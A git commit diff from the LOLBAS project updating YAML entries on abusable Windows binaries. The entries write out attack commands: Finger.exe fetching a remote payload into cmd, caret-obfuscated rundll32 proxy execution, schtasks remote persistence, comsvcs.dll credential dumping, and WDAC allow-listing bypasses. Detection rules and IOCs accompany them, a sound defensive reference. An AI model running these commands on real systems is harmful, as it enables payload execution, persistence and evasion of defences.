mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
Adding more missed-out entries
This commit is contained in:
parent
52302853c9
commit
085aaa37b1
@ -1,31 +1,31 @@
|
||||
---
|
||||
Name: Finger.exe
|
||||
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||||
Author: Ruben Revuelta
|
||||
Created: 2021-08-30
|
||||
Commands:
|
||||
- Command: finger user@example.host.com | more +2 | cmd
|
||||
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
|
||||
Usecase: Download malicious payload
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\finger.exe
|
||||
- Path: c:\windows\syswow64\finger.exe
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
|
||||
- IOC: finger.exe should not be run on a normal workstation.
|
||||
- IOC: finger.exe connecting to external resources.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/997340270273409024
|
||||
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||||
Acknowledgement:
|
||||
- Person: Ruben Revuelta (MAPFRE CERT)
|
||||
Handle: '@rubn_RB'
|
||||
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
---
|
||||
Name: Finger.exe
|
||||
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||||
Author: Ruben Revuelta
|
||||
Created: 2021-08-30
|
||||
Commands:
|
||||
- Command: finger user@example.host.com | more +2 | cmd
|
||||
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
|
||||
Usecase: Download malicious payload
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\finger.exe
|
||||
- Path: c:\windows\syswow64\finger.exe
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
|
||||
- IOC: finger.exe should not be run on a normal workstation.
|
||||
- IOC: finger.exe connecting to external resources.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/997340270273409024
|
||||
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||||
Acknowledgement:
|
||||
- Person: Ruben Revuelta (MAPFRE CERT)
|
||||
Handle: '@rubn_RB'
|
||||
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||||
Handle: '@Ocelotty6669'
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
|
@ -10,21 +10,21 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code_Sample:
|
||||
|
@ -17,7 +17,7 @@ Commands:
|
||||
Category: UAC Bypass
|
||||
Privileges: Administrator
|
||||
MitreID: T1218.014
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||
Description: Create a scheduled task on a remote computer for persistence/lateral movement
|
||||
Usecase: Create a remote task to run daily relative to the the time of creation
|
||||
Category: Execute
|
||||
Privileges: Administrator
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ieframe.dll
|
||||
- Path: c:\windows\syswow64\ieframe.dll
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\mshtml.dll
|
||||
- Path: c:\windows\syswow64\mshtml.dll
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\pcwutl.dll
|
||||
- Path: c:\windows\syswow64\pcwutl.dll
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
|
||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
UseCase: Load an executable payload.
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shdocvw.dll
|
||||
- Path: c:\windows\syswow64\shdocvw.dll
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
||||
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\syssetup.dll
|
||||
- Path: c:\windows\syswow64\syssetup.dll
|
||||
|
@ -10,42 +10,42 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
|
||||
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
Usecase: Load an executable payload by calling a .url file with or without quotes.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Description: Launch an executable by calling OpenURL.
|
||||
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
|
||||
Description: Launch an executable by calling FileProtocolHandler.
|
||||
Usecase: Launch an executable.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Description: Launch an executable by calling FileProtocolHandler.
|
||||
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
|
||||
Description: Launch a HTML application payload by calling FileProtocolHandler.
|
||||
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\url.dll
|
||||
- Path: c:\windows\syswow64\url.dll
|
||||
|
@ -10,14 +10,14 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Description: Launch an executable payload by calling RouteTheCall (obfuscated).
|
||||
Usecase: Launch an executable.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\zipfldr.dll
|
||||
- Path: c:\windows\syswow64\zipfldr.dll
|
||||
|
@ -10,7 +10,7 @@ Commands:
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
MitreID: T1003.001
|
||||
OperatingSystem: Windows
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\comsvcs.dll
|
||||
Code_Sample:
|
||||
|
@ -1,24 +1,24 @@
|
||||
---
|
||||
Name: CL_LoadAssembly.ps1
|
||||
Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Resources:
|
||||
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
Name: CL_LoadAssembly.ps1
|
||||
Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Resources:
|
||||
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,24 +1,24 @@
|
||||
---
|
||||
Name: UtilityFunctions.ps1
|
||||
Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Resources:
|
||||
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
|
||||
Acknowledgement:
|
||||
- Person: Nick VanGilder
|
||||
Handle: '@nickvangilder'
|
||||
---
|
||||
---
|
||||
Name: UtilityFunctions.ps1
|
||||
Description: PowerShell Diagnostic Script
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
|
||||
Description: Proxy execute Managed DLL with PowerShell
|
||||
Usecase: Execute proxied payload with Microsoft signed binary
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Resources:
|
||||
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
|
||||
Acknowledgement:
|
||||
- Person: Nick VanGilder
|
||||
Handle: '@nickvangilder'
|
||||
---
|
||||
|
@ -1,39 +1,39 @@
|
||||
---
|
||||
Name: Fsi.exe
|
||||
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: fsi.exe c:\path\to\test.fsscript
|
||||
Description: Execute F# code via script file
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: Fsi.exe execution may be suspicious on non-developer machines
|
||||
Resources:
|
||||
- Link: https://twitter.com/NickTyrer/status/904273264385589248
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
Name: Fsi.exe
|
||||
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: fsi.exe c:\path\to\test.fsscript
|
||||
Description: Execute F# code via script file
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: Fsi.exe execution may be suspicious on non-developer machines
|
||||
Resources:
|
||||
- Link: https://twitter.com/NickTyrer/status/904273264385589248
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,35 +1,35 @@
|
||||
---
|
||||
Name: FsiAnyCpu.exe
|
||||
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: fsianycpu.exe c:\path\to\test.fsscript
|
||||
Description: Execute F# code via script file
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
|
||||
Name: FsiAnyCpu.exe
|
||||
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: fsianycpu.exe c:\path\to\test.fsscript
|
||||
Description: Execute F# code via script file
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
|
||||
Acknowledgement:
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
@ -1,34 +1,34 @@
|
||||
---
|
||||
Name: Procdump(64).exe
|
||||
Description: SysInternals Memory Dump Tool
|
||||
Author: 'Alfie Champion (@ajpc500)'
|
||||
Created: 2020-10-14
|
||||
Commands:
|
||||
- Command: procdump.exe -md calc.dll explorer.exe
|
||||
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
|
||||
Usecase: Performs execution of unsigned DLL.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
- Command: procdump.exe -md calc.dll foobar
|
||||
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
|
||||
Usecase: Performs execution of unsigned DLL.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml
|
||||
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||
- IOC: Process creation with given '-md' parameter
|
||||
- IOC: Anomalous child processes of procdump
|
||||
- IOC: Unsigned DLL load via procdump.exe or procdump64.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
|
||||
Acknowledgement:
|
||||
- Name: Alfie Champion
|
||||
Handle: '@ajpc500'
|
||||
---
|
||||
---
|
||||
Name: Procdump(64).exe
|
||||
Description: SysInternals Memory Dump Tool
|
||||
Author: 'Alfie Champion (@ajpc500)'
|
||||
Created: 2020-10-14
|
||||
Commands:
|
||||
- Command: procdump.exe -md calc.dll explorer.exe
|
||||
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
|
||||
Usecase: Performs execution of unsigned DLL.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
- Command: procdump.exe -md calc.dll foobar
|
||||
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
|
||||
Usecase: Performs execution of unsigned DLL.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml
|
||||
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||
- IOC: Process creation with given '-md' parameter
|
||||
- IOC: Anomalous child processes of procdump
|
||||
- IOC: Unsigned DLL load via procdump.exe or procdump64.exe
|
||||
Resources:
|
||||
- Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
|
||||
Acknowledgement:
|
||||
- Name: Alfie Champion
|
||||
Handle: '@ajpc500'
|
||||
---
|
||||
|
@ -1,31 +1,31 @@
|
||||
---
|
||||
Name: VisualUiaVerifyNative.exe
|
||||
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
|
||||
Author: Jimmy (@bohops)
|
||||
Created: 2021-09-26
|
||||
Commands:
|
||||
- Command: VisualUiaVerifyNative.exe
|
||||
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
|
||||
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
|
||||
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
||||
Resources:
|
||||
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
|
||||
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
|
||||
Acknowledgement:
|
||||
- Person: Lee Christensen
|
||||
Handle: '@tifkin'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
